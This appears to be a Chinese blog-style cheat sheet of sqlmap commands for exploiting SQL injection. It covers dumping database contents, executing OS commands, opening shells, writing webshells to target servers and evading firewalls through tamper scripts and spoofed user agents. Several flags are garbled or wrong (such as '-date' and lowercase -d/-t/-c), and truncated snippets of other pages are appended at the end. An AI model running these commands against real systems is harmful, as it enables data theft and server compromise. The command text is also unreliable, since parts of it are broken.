sqlmap是我們常用的一款sql注入漏洞檢測工具,為了方便大家平時的使用,在此分享一下我總結的一下命令。
目錄結構:
extra:額外功能
lib:連線庫,注入引數,提權操作
tamper:繞過指令碼
thirdparty:第三方外掛程式
txt:字典,例如瀏覽器**,表,列,關鍵字
udf:自定義攻擊載荷
waf:常見防火牆特徵–identify-waf
常用命令:
1.注入檢測方式:
get方式:sqlmap.py -u "url"
post方式:sqlmap.py -u "url"
-date "post資料"
cookie方式:sqlmap.py -u "url"
-cookie "cookie資料"
2.獲取資料庫資訊
獲取資料庫型別以及版本:sqlmap.py -u "url"
獲取**使用的資料庫名和使用者名稱:sqlmap.py -u "url"
--current-db
sqlmap.py -u "url"
--current-user
3.獲取資料量和使用者許可權
獲取資料庫的資料量:sqlmap.py -u "url"
--count -d "資料庫名"
判斷使用者許可權:sqlmap.py -u "url"
--privileges
4.mysql注入
mysql結構:庫-表-列-資料(字段內容)
注入順序:
首先獲取當前庫名:sqlmap.py -u "url"
--current-db
其次獲取庫中表名:sqlmap.py -u "url"
--tables -d "資料庫名"
然後獲取庫中某個表的列名:sqlmap.py -u "url"
--columns -t "表名"
-d "庫名"
最後獲取庫中某個表名的某個列名的字段內容:sqlmap.py -u "url"
--dump -c "列名"
-t "表名"
-d "庫名"
5.管理資料庫
//girhub/pymysql/pymysql)
--sqlshell
6.延時注入
針對頁面無變化,無法用布林真假判斷,無法報錯的情況下注入。
sqlmap.py -u "url"
--delay 數字值(秒為單位)
sqlmap.py -u "url"
-safe-freq
7.互動式命令執行和寫webshell
命令執行:sqlmap.py -u "url"
--os-cmd=
"命令"
webshell:sqlmap.py -u "url"
--os-shell
8.tamper指令碼
sqlmap.py -u "url"
--tamper=
"指令碼名字"
9.本地寫入webshell
sqlmap.py -u "url"--
file
-write "本地檔案路徑"--
file
-dest "目標檔案路徑"
10.批量檢測注入漏洞
sqlmap.py -m 本地檔案路徑
結合burpsuite:sqlmap.py -l 本地檔案路徑 -
-batch -smart
//batch:自動選擇yes,smart:啟發式快速判斷
//瀏覽器**
--level=(1
-5)//測試水平等級
--risk=(0
-3)//風險等級
sqlmap常用命令
1.找到注入點url 2.sqlmap u url v 1 dbs 列出資料庫 或者 sqlmap u url v 1 current db 顯示當前資料庫 3.sqlmap u url v 1 users 列出資料庫使用者 current user當前資料庫使用者 4.sqlmap u url v...
sqlmap常用命令
sqlmap.py u current db 獲取當前資料庫名稱 sqlmap.py u tables d db name 列出指定資料庫的所有表名 列出指定資料庫 指定表的欄位名 列出指定資料庫 指定表 指定欄位的內容,c column name 可以省略,省略的話會列出當前表的所有字段內容 攜帶...
SQLmap常用命令
使用sqlmap掃瞄時,http頭部字段 useragent包含sqlmap等敏感字元可能會被waf攔截 可以採用模擬搜尋引擎訪問 user agent 搜尋引擎http頭 自定義useragent,防止cc流量攔截 delay 1 設定延遲時間 safe freq 3 請求延遲繞過一些waf可以使...